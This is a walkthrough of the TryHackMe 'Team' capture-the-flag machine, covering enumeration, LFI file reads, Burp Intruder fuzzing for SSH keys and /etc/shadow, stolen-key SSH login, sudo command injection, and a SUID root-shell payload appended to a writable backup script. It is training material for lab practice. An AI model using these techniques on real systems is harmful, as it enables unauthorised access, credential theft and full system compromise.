Full Walk-through (Beginner-Friendly Boot2Root)
Team is a beginner-friendly Boot2Root machine on TryHackMe that demonstrates a classic attack chain:
- LFI โ Sensitive Data Disclosure โ SSH Key Theft โ User Pivot โ Misconfiguration Script โ Root
This room is a great way to practice enumeration, privilege escalation, and chaining multiple vulnerabilities together.
๐ Step 1 - Enumeration
As always, start with an Nmap scan to find open ports:
nmap -sC -sV -T4 -p- 10.10.245.208Results:
21/tcpโ FTP (vsftpd 3.0.5)22/tcpโ SSH (OpenSSH 8.2p1)80/tcpโ HTTP (Apache 2.4.41, default page)
Since port 80 was open, I launched Gobuster to find hidden directories:
gobuster dir -u http://10.10.245.208 -w /usr/share/wordlists/dirb/common.txtInteresting results included hidden .ht* files and /server-status.
๐ Step 2 - Discovering Virtual Hosts & LFI
When visiting the target on port 80, I was greeted with the default Apache2 Ubuntu page.
Checking the page source revealed a comment:
If you see this add 'team.thm' to your hosts fileSo I added the host to my machine:
sudo nano /etc/hosts
# Add:
10.10.245.208 team.thmReloading http://team.thm showed a placeholder page under development, with a link to /dev/.
To access that, I added another subdomain to /etc/hosts:
sudo nano /etc/hosts
# Add:
10.10.245.208 team.thm dev.team.thmNow http://dev.team.thm opened, where I found the vulnerable script:
script.php?page=Testing for LFI
Using BurpSuite, I intercepted a request to script.php and replaced the page parameter with /etc/passwd:
http://dev.team.thm/script.php?page=/etc/passwdAnd it worked ๐ the server returned the contents of /etc/passwd.
This confirmed a Local File Inclusion vulnerability.
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
dale:x:1000:1000:anon,,,:/home/dale:/bin/bash
gyles:x:1001:1001::/home/gyles:/bin/bash
ftpuser:x:1002:1002::/home/ftpuser:/bin/sh
ftp:x:110:116:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-timesync:x:112:117:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
tss:x:113:120:TPM software stack,,,:/var/lib/tpm:/bin/false
tcpdump:x:114:121::/nonexistent:/usr/sbin/nologin
fwupd-refresh:x:115:122:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
ssm-user:x:1003:1005::/home/ssm-user:/bin/sh
ubuntu:x:1004:1007:Ubuntu:/home/ubuntu:/bin/bash๐งฐ Step 3 - Exploiting LFI with BurpSuite & Intruder
We already confirmed that the parameter page= in
http://dev.team.thm/script.php?page=/etc/passwdis vulnerable to Local File Inclusion (LFI).
Reading /etc/passwd gave us a list of system accounts and real users:
dalegylesubuntussm-userftpuser
โฆbut this is only the beginning. To escalate further, we need to hunt for more sensitive files: SSH keys, configs, logs, etc. Instead of testing them manually, we'll automate discovery with BurpSuite.
๐ 1. Capture the Request in Burp
- Open BurpSuite and make sure your browser is configured to use Burp's proxy (127.0.0.1:8080).
- Visit:
http://dev.team.thm/script.php?page=/etc/passwd3. In Burp โ Proxy tab โ click Forward until you see the request in HTTP history.
4. Right-click the request โ Send to Intruder.
โ๏ธ 2. Set Up Burp Intruder
- In Intruder โ Positions, highlight the value after
page=(/etc/passwd). - Click Clear ยง, then highlight the payload (
/etc/passwd) and click Add ยง.
Your request will now look like:
GET /script.php?page=ยง/etc/passwdยง HTTP/1.1
Host: dev.team.thm3. Go to the Payloads tab.
4. Load a wordlist of common LFI targets. For example:
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txtThis list contains hundreds of sensitive Linux file paths: /etc/shadow, /root/.ssh/id_rsa, Apache configs, logs, etc.
๐ 3. Run the Attack
- Click Start Attack.
- Burp will try each file path in place of
/etc/passwd. - Watch the Length and Response columns:
. If the length is significantly larger than the baseline (404 or "File not found"), it means the file was included successfully.
- Example hits:
/etc/ssh/sshd_configโ contained Dale's private SSH key./home/dale/.ssh/id_rsa(if accessible)./var/log/apache2/error.log(may reveal credentials).
๐ฉ 4. Finding user.txt
While fuzzing, one of the payloads pointed us to a user flag. By adjusting the request, we could include:
http://dev.team.thm/script.php?page=/home/dale/user.txt๐ 5. Example Discovery
From the Intruder attack, one of the most valuable results was:
/etc/ssh/sshd_configOpening this via LFI showed:
AllowUsers dale gyles root ubuntu- And inside comments: an OpenSSH private key for dale : Save it as
dale_id_rsaon your attacker machine:
-----BEGIN OPENSSH PRIVATE KEY-----
*********************************************************
-----END OPENSSH PRIVATE KEY-----This was the critical pivot - exporting the key allowed us to SSH into the box as dale.
Usage
- Save as
dale_id_rsa:
nano dale_id_rsa
chmod 600 dale_id_rsa๐ Step 4 โ Leaking Sensitive Files
connected over SSH:
ssh -i dale_id_rsa dale@10.10.245.208๐จ Dale โ Gyles (Privilege Escalation #1)
Running sudo -l as dale showed:
(dale) NOPASSWD: /home/gyles/admin_checksThat meant I could run the script /home/gyles/admin_checks as gyles without a password.
Inspecting the script revealed:
read -p "Enter 'date' to timestamp the file: " error
$error 2>/dev/nullThe user input ($error) was executed directly a clear command injection.
So I exploited it:
sudo -u gyles /home/gyles/admin_checks
# When prompted:
id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),108(lxd),1003(editors),1004(adminOutput confirmed execution as gyles.
I stabilized my shell:
script -qc /bin/bash /dev/nullNow I had my second user.
๐จโ๐ป Gyles โ Root (Privilege Escalation #2)
Checking id revealed gyles was in some interesting groups:
gyles : gyles lxd editors adminThe admin group looked promising.
I found a suspicious script:
ls -la /usr/local/bin/main_backup.sh
-rwxrwxr-x 1 root admin ...Owned by root, group-owned by admin โ gyles could modify it.
A quick search showed another script calling it:
grep -R "main_backup.sh" /opt/
/opt/admin_stuff/script.sh:main_site="/usr/local/bin/main_backup.sh"So whenever root ran /opt/admin_stuff/script.sh, it would also execute main_backup.sh.
Since I could edit main_backup.sh, this was a perfect escalation point.
๐ Step 5 - Exploiting main_backup.sh
I injected a payload to create a SUID root shell:
echo 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash' >> /usr/local/bin/main_backup.shWhen /opt/admin_stuff/script.sh executed, it triggered my payload.
Now I had:
/tmp/rootbash -pโก๏ธ A full root shell!
๐ Conclusion
This room chained several classic vulnerabilities together:
- LFI exploitation,
- key disclosure,
- sudo misconfig,
- insecure script permissions.
They all led us from a web vulnerability to full system compromise.
๐ That's how I rooted the Team machine.
Happy Hacking! Until the next write up :)